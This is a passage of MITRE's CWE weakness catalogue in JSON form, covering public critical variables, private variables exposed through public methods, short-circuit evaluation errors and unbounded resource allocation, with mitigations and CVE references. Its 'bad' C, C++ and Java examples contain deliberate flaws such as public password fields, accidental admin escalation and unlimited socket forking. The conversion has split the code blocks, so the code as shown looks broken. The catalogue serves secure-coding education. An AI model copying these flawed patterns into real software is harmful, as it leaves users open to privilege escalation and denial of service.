well as a public constructor for the class and a public method to authorize access to the user account.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"#define MAX_PASSWORD_LENGTH 15#define MAX_USERNAME_LENGTH 15class UserAccount{};","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:int authorizeAccess(char *username, char *password){}char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UserAccount(char *username, char *password){}","xhtml:br":"","xhtml:div":{"#text":"if ((strlen(username) > MAX_USERNAME_LENGTH) ||(strlen(password) > MAX_PASSWORD_LENGTH)) {}strcpy(this->username, username);strcpy(this->password, password);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"ExitError(\\"Invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if ((strlen(username) > MAX_USERNAME_LENGTH) ||(strlen(password) > MAX_PASSWORD_LENGTH)) {}if (strcmp(this->username, username) ||strcmp(this->password, password))else","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"return 0;","attr":{"@_style":"margin-left:10px;"}},{"#text":"return 1;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":["// if the username and password in the input parameters are equal to","// the username and password of this account class then authorize access","// otherwise do not authorize access"]}}],"xhtml:br":["","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"class UserAccount{public:private:};","xhtml:br":["","","",""],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"However, the member variables username and password are declared public and therefore will allow access and changes to the member variables to anyone with access to the object. These member variables should be declared private as shown below to prevent unauthorized access and changes."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-3860","Description":"variables declared public allows remote read of system properties such as user name and home directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3860"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ01-J","Entry_Name":"Declare data members as private and provide accessible wrapper methods"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"},{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-15"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Common_Consequences, Description, Name, References, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Critical Variable Declared Public","attr":{"@_Date":"2019-01-03"}}}},"767":{"attr":{"@_ID":"767","@_Name":"Access to Critical Private Variable via Public Method","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software defines a public method that reads or modifies a private variable.","Extended_Description":"If an attacker modifies the variable to contain unexpected values, this could violate assumptions from other parts of the code. Additionally, if an attacker can read the private variable, it may expose sensitive information or make it easier to launch further attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use class accessor and mutator methods appropriately. Perform validation when accepting data from a public method that is intended to modify a critical private variable. Also be sure that appropriate access controls are being applied when a public method interfaces with critical data."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example declares a critical variable to be private, and then allows the variable to be modified by public methods.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"private: float price;public: void changePrice(float newPrice) {}","xhtml:br":"","xhtml:div":{"#text":"price = newPrice;","attr":{"@_style":"margin-left:10px;"}}}}},{"Intro_Text":"The following example could be used to implement a user forum where a single user (UID) can switch between multiple profiles (PID).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class Client {}","xhtml:div":{"#text":"private int UID;public int PID;private String userName;public Client(String userName){}public void setPID(int ID) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"PID = getDefaultProfileID();UID = mapUserNametoUID( userName );this.userName = userName;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"UID = ID;","attr":{"@_style":"margin-left:10px;"}}]}}},"Body_Text":"The programmer implemented setPID with the intention of modifying the PID variable, but due to a typo. accidentally specified the critical variable UID instead. If the program allows profile IDs to be between 1 and 10, but a UID of 1 means the user is treated as an admin, then a user could gain administrative privileges as a result of this typo."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"OOP31-PL","Entry_Name":"Do not access private variables or subroutines in other packages","Mapping_Fit":"Imprecise"}]},"Notes":{"Note":{"#text":"This entry is closely associated with access control for public methods. If the public methods are restricted with proper access controls, then the information in the private variable will not be exposed to unexpected parties. There may be chaining or composite relationships between improper access controls and this weakness.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"768":{"attr":{"@_ID":"768","@_Name":"Incorrect Short Circuit Evaluation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring.","Extended_Description":{"xhtml:p":["Usage of short circuit evaluation, though well-defined in the C standard, may alter control flow in a way that introduces logic errors that are difficult to detect, possibly causing errors later during the software\'s execution. If an attacker can discover such an inconsistency, it may be exploitable to gain arbitrary control over a system.","If the first condition of an \\"or\\" statement is assumed to be true under normal circumstances, or if the first condition of an \\"and\\" statement is assumed to be false, then any subsequent conditional may contain its own logic errors that are not detected during code review or testing.","Finally, the usage of short circuit evaluation may decrease the maintainability of the code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Note":"Widely varied consequences are possible if an attacker is aware of an unexpected state in the software after a conditional. It may lead to information exposure, a system crash, or even complete attacker control of the system."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Minimizing the number of statements in a conditional that produce side effects will help to prevent the likelihood of short circuit evaluation to alter control flow in an unexpected way."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following function attempts to take a size value from a user and allocate an array of that size (we ignore bounds checking for simplicity). The function tries to initialize each spot with the value of its index, that is, A[len-1] = len - 1; A[len-2] = len - 2; ... A[1] = 1; A[0] = 0; However, since the programmer uses the prefix decrement operator, when the conditional is evaluated with i == 1, the decrement will result in a 0 value for the first part of the predicate, causing the second portion to be bypassed via short-circuit evaluation. This means we cannot be sure of what value will be in A[0] when we return the array to the user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define PRIV_ADMIN 0#define PRIV_REGULAR 1typedef struct{} user_t;user_t *Add_Regular_Users(int num_users){}int main(){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"int privileges;int id;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"user_t* users = (user_t*)calloc(num_users, sizeof(user_t));int i = num_users;while( --i && (users[i].privileges = PRIV_REGULAR) ){}return users;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"users[i].id = i;","attr":{"@_style":"margin-left:10px;"}}},{"#text":"user_t* test;int i;test = Add_Regular_Users(25);for(i = 0; i < 25; i++) printf(\\"user %d has privilege level %d\\\\n\\", test[i].id, test[i].privileges);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}]}},"Body_Text":"When compiled and run, the above code will output a privilege level of 1, or PRIV_REGULAR for every user but the user with id 0 since the prefix increment operator used in the if statement will reach zero and short circuit before setting the 0th user\'s privilege level. Since we used calloc, this privilege will be set to 0, or PRIV_ADMIN."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"769":{"attr":{"@_ID":"769","@_Name":"DEPRECATED: Uncontrolled File Descriptor Consumption","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-774. All content has been transferred to CWE-774.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Alternate_Terms, Description, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"File Descriptor Exhaustion","attr":{"@_Date":"2017-11-08"}},{"#text":"Uncontrolled File Descriptor Consumption","attr":{"@_Date":"2019-01-03"}}]}},"770":{"attr":{"@_ID":"770","@_Name":"Allocation of Resources Without Limits or Throttling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.","Extended_Description":{"xhtml:p":"Code frequently has to work with limited resources, so programmers must be careful to ensure that resources are not consumed too quickly, or too easily. Without use of quotas, resource limits, or other protection mechanisms, it can be easy for an attacker to consume many resources by rapidly making many requests, or causing larger resources to be used than is needed. When too many resources are allocated, or if a single resource is too large, then it can prevent the code from working correctly, possibly leading to a denial of service."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"},{"Phase":"System Configuration"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"When allocating resources without limits, an attacker could prevent other systems, applications, or processes from accessing the same type of resource."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-8"},"Method":"Manual Static Analysis","Description":"Manual static analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. If denial-of-service is not considered a significant risk, or if there is strong emphasis on consequences such as code execution, then manual analysis may not focus on this weakness at all."},{"Method":"Fuzzing","Description":{"xhtml:p":["While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find uncontrolled resource allocation problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to limit resource allocation may be the cause.","When the allocation is directly affected by numeric inputs, then fuzzing may produce indications of this weakness."]},"Effectiveness":"Opportunistic"},{"Method":"Automated Dynamic Analysis","Description":"Certain automated dynamic analysis techniques may be effective in producing side effects of uncontrolled resource allocation problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame. Manual analysis is likely required to interpret the results."},{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Specialized configuration or tuning may be required to train automated tools to recognize this weakness.","Automated static analysis typically has limited utility in recognizing unlimited allocation problems, except for the missing release of program-independent system resources such as files, sockets, and processes, or unchecked arguments to memory. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired, or if too much of a resource is requested at once, as can occur with memory. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.","Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day."]}}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits."},{"Phase":"Architecture and Design","Description":"Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410."},{"Phase":"Architecture and Design","Description":"Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness_Notes":"This will only be applicable to cases where user input can influence the size or frequency of resource allocations."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Mitigation of resource exhaustion attacks requires that the target system either:","The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.","The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays","uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]}}}},{"Phase":"Architecture and Design","Description":"Ensure that protocols have specific limits of scale placed on them."},{"attr":{"@_Mitigation_ID":"MIT-38.1"},"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.","Ensure that all failures in resource allocation place the system into a safe posture."]}},{"attr":{"@_Mitigation_ID":"MIT-47"},"Phase":["Operation","Architecture and Design"],"Strategy":"Resource Limitation","Description":{"xhtml:p":["Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.","When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users.","Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703)."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-25"},"Intro_Text":"This code allocates a socket and forks each time it receives a new connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {}","xhtml:br":"","xhtml:div":{"#text":"newsock=accept(sock, ...);printf(\\"A connection has been accepted\\\\n\\");pid = fork();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely."},{"attr":{"@_Demonstrative_Example_ID":"DX-50"},"Intro_Text":"In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int writeDataFromSocketToFile(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port);if (socket < 0) {}if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) {}closeSocket(socket);","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (openFileToWrite(filename) > 0) {}closeFile();","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0){}","xhtml:div":{"#text":"if (!(writeToFile(buffer) > 0))","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}}]}}}},"Body_Text":"This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients\' ability to access the service."},{"attr":{"@_Demonstrative_Example_ID":"DX-51"},"Intro_Text":"In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessage(char **message){}","xhtml:br":["","",""],"xhtml:i":"/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *body;int length = getMessageLength(message[0]);if (length > 0) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"body = &message[1][0];processMessageBody(body);return(SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Unable to process message; invalid message length\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"unsigned int length = getMessageLength(message[0]);if ((length > 0) && (length < MAX_LENGTH)) {...}","xhtml:br":""}}],"Body_Text":["This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check","Also, consider changing the type from \'int\' to \'unsigned int\', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code."]},{"attr":{"@_Demonstrative_Example_ID":"DX-52"},"Intro_Text":"In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void acceptConnections() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);t.start();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}},"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;...public void acceptConnections() {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}},"xhtml:br":["",""]}}}}],"Body_Text":["In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.","The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated."]},{"Intro_Text":"An unnamed web site allowed a user to purchase tickets for an event. A menu option allowed the user to purchase up to 10 tickets, but the back end did not restrict the actual number of tickets that could be purchased.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-667"}}}},{"Intro_Text":"Here the problem is that every time a connection is made, more memory is allocated. So if one just opened up more and more connections, eventually the machine would run out of memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"bar connection() {}endConnection(bar foo) {}int main() {}","xhtml:div":[{"#text":"foo = malloc(1024);return foo;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"free(foo);","attr":{"@_style":"margin-left:10px;"}},{"#text":"while(1) {}endConnection(foo)","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=connection();","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":["",""]}],"xhtml:br":["","","",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-4017","Description":"Language interpreter does not restrict the number of temporary files being created when handling a MIME request with a large number of parts..","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4017"},{"Reference":"CVE-2009-2726","Description":"Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726"},{"Reference":"CVE-2009-2540","Description":"Large integer value for a length property in an object causes a large amount of memory allocation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540"},{"Reference":"CVE-2009-2054","Description":"Product allows exhaustion of file descriptors when processing a large number of TCP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054"},{"Reference":"CVE-2008-5180","Description":"Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180"},{"Reference":"CVE-2008-1700","Description":"Product allows attackers to cause a denial of service via a large number of directives, each 